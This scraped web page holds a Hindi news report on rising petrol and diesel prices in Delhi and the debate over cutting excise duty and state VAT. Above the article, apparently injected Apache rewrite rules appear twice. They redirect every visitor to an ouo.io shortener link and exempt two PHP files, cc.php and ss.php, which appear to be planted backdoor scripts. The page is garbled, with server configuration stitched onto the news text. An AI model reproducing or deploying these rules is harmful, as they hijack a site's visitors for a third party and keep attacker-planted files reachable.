
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 919
नई दिल्ली। दिल्ली में पेट्रोल 73.73 रुपये प्रति लीटर हो गया और वहीं डीजल के दाम भी 64.58 रुपये पहुंच गए। बता दें कि डीजल के दाम 7 फरवरी 2018 के दामों (64.22) से भी मंहगे है। इसी के साथ सरकार से पेट्रोल डीज़ल पर लगने वाले एक्साइज़ टैक्स में कटौती की मांग भी उठ रही है।
एक्साइज ड्यूटी के साथ-साथ केन्द्र ने राज्यों से वैट मे भी में भी कटौती करने के निर्देश दिए, लेकिन महाराष्ट्र, गुजरात, मध्य प्रदेश और हिमाचल प्रदेश को छोड़कर दूसरे राज्यों और एक बीजेपी शासित राज्य ने भी इस निर्देश को नज़रअंदाज कर दिया। केन्द्र ने अक्टूबर 2017 में एक्साइज़ ड्यूटी में प्रति लीटर पर 2 रुपये कटौती की थी। जब राजधानी में पेट्रोल की कीमत 70.88 रुपये थी और डीज़ल की कीमत 59.14 रुपए थी तब एक्साइज ड्यूटी की कटौती की वजह से अक्टूबर में डीज़ल के कीमतें 56.89 रुपए और पेट्रोल 68.38 की दर पर पहुंच गई थी। अक्टूबर में एक्साइज़ ड्यूटी में कटौती के कारण सरकार को सालाना रेवेन्यू में 26000 करोड़ और बाकी वित्त वर्ष में 13000 करोड़ का नुकसान उठाना पड़ा था। अंतरराष्ट्रीय तेल कीमत के बोझ को कम करने के लिए सरकार ने नवंबर 2014 और जनवरी 2016 के बीच 9 बार एक्साइज़ ड्यूटी को बढ़ाया। राज्य तेल कंपनियां जैसे इंडियन ऑयल, भारत पेट्रोलियम और हिन्दुस्तान पेट्रोल ने भी हर महीने के पहली और 16 को अपने रेट्स रिवाइस करने की 15 साल प्रथा को तोड़ते हुए रोज रेट निर्धारित करने का नियम लागू किया और तब से पेट्रोल और डीज़ल के दाम डेली बेसिस पर ही निर्धारित किए जाते है।